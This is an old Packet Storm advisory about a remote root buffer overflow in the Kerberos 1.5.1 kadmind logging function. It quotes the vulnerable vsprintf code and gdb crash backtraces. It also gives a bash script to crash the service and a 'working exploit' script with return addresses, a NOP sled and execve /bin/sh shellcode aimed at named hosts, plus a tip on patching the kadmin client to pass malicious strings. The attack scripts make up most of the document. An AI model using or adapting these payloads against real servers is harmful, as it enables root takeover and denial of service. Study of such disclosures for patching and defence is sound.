kadmind-overflow.txt

2007-04-11T00:00:00
ID PACKETSTORM:55828
Type packetstorm
Reporter c0ntex
Modified 2007-04-11T00:00:00

Description

                                        
                                            `Kerberos Version 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability  
  
  
The Issue:  
Remotely exploitable buffer overflow vulnerability in Kerberos kadmind service  
  
The Versions:  
krb5-1.5.1 (Latest version from http://eb.mit.edu/Kerberos/ )  
krb5-server-1.4.3-5.1 (Latest version from Fedora yum update)  
  
The Environment:  
Linux Fedora Core 5 x86_64 bit  
  
The Overview:  
  
There is a remotly exploitable overflow bug in Kerberos kadmind service that can be triggered during the administration  
of principals via kadmin or kadmin.local and either in a local context or a remote context, which will allow the attacker  
the possibility of having Kerberos server yield the permissions of the user that it is running a, usually root. It can  
also be used as a denail of service against kadmind.  
  
root 1834 1 0 22:29 ? 00:00:00 /usr/kerberos/sbin/krb5kdc  
root 6600 1 0 23:00 ? 00:00:00 /usr/kerberos/sbin/kadmind  
  
To trigger the exploit, a valid user account has to first of all authenticate to the Kerberos service and have a ticket  
generated, the user therefor must be or have access to an admin account that can access thre remote kadmind  
service, which limits the scope of the attack slightly. However, this still allows anyone with the most limited access  
to the service to kill it or gain root access and as such should be treated as critical.  
  
A trivial issue encountered was that the kadmin client would filter out crazy strings passed to it, so you can't use it  
by default to send in shellcode and return addresses. To get around that we modify the client source code a bit to  
honour our malicious values and then upload it to our user directory, and as if by magic it will no longer bail when it  
encounters these strings ;)  
  
  
Following is the vulnerable function with the unused code, ifdefs and comments removed to make it easier to read  
  
/* krb5-1.5.1/src/lib/kadm5/logger.c  
  
static int  
klog_vsyslog(int priority, const char *format, va_list arglist)  
{  
char outbuf[KRB5_KLOG_MAX_ERRMSG_SIZE];  
char *syslogp;  
  
strncpy(outbuf, ctime(&now) + 4, 15);  
cp += 15;  
  
syslogp = &outbuf[strlen(outbuf)];  
  
vsprintf(syslogp, format, arglist);  
  
*/  
  
  
By exersizing any of the option presented to us in kadmin, we should be able to trigger this little bug, including:  
  
add_principal  
delete_principal  
modify_principal  
change_password  
get_principal  
... and on.....  
  
Another nice feature to kadmin is that it is possible to run it from the command line, and as such this makes crafting  
a payload much easier :) by running the following script, it should be possible to trigger this bug and kill kadmind:  
  
##########  
  
#!/bin/bash  
ADDIT="get_principal"  
ATTACK="cr4yz33_h4xx0r"  
KADMIN="/usr/kerberos/sbin/kadmin"  
KADMINDP="`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print $4}'| sed -e s/0.0.0.0://`"  
PRINCIPAL="root/admin@OPEN-SECURITY.ORG"  
TARGET=coredump.open-security.org  
TRIGGAH="`perl -e 'print "A" x 5000'`"  
  
$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q "$ADDIT -pw $ATTACK $TRIGGAH"  
  
##########  
  
  
After running this script with various sized buffer values, we get faults in the following locations:  
  
// With 2000 A's //  
#0 0x0000003a2ed427d5 in vfprintf () from /lib64/libc.so.6  
#1 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6  
#2 0x00002aaaaaabb2ea in klog_vsyslog (priority=5,  
format=0x40c4e0 "Request: %s, %s, %s, client=%s, service=%s, addr=%s", arglist=0x7ffffdb40e60)  
at logger.c:854  
#3 0x4141414141414141 in ?? ()  
#4 0x4141414141414141 in ?? ()  
#5 0x4141414141414141 in ?? ()  
....  
  
  
// With 5000 A's (On the Fedora version) //  
#0 0x00002aaaab65fc90 in strlen () from /lib64/libc.so.6  
#1 0x00002aaaab63088b in vfprintf () from /lib64/libc.so.6  
#2 0x00002aaaab6ca8ad in __vsprintf_chk () from /lib64/libc.so.6  
#3 0x00002aaaaabd2283 in krb5_klog_syslog () from /usr/lib64/libkadm5srv.so.5  
#4 0x4141414141414141 in ?? ()  
#5 0x4141414141414141 in ?? ()  
....  
  
  
// With 30000 a's //  
#0 0x0000003a2ed750ae in mempcpy () from /lib64/libc.so.6  
#1 0x0000003a2ed69a5b in _IO_default_xsputn_internal () from /lib64/libc.so.6  
#2 0x0000003a2ed44294 in vfprintf () from /lib64/libc.so.6  
#3 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6  
#4 0x00002aaaaaabb2ea in klog_vsyslog (priority=5,  
format=0x40c4e0 "Request: %s, %s, %s, client=%s, service=%s, addr=%s", arglist=0x7fffbe94f220)  
at logger.c:854  
#5 0x6161616161616161 in ?? ()  
....  
  
  
  
In our vulnerable code we have the function klog_vsyslog, which is a lame attempt to create a custom logger, as we can  
see by the result of this advisory.   
  
  
Here is the working exploit:  
  
#!/bin/bash  
ADDIT="get_principal"  
ATTACK="cr4yz33_h4xx0r"  
KADMIN="kadmin"  
KADMINDP="`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print  
$4}'| sed -e s/0.0.0.0://`"  
PRINCIPAL="root/admin@OPEN-SECURITY.ORG"  
TARGET=debauch.open-security.org  
TRIGGAH="`perl -e 'print "A" x 900'`PAD`perl -e 'printf "\xc0\xfa\xff\xbf\x88\xf8\xff\xbf" x 20'``perl -e 'print   
"C" x 6'``perl -e 'print "\x90" x 50'`  
`echo -e "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"`"  
  
$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q "$ADDIT $TRIGGAH"  
  
###end  
  
Reference:  
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=500  
  
  
`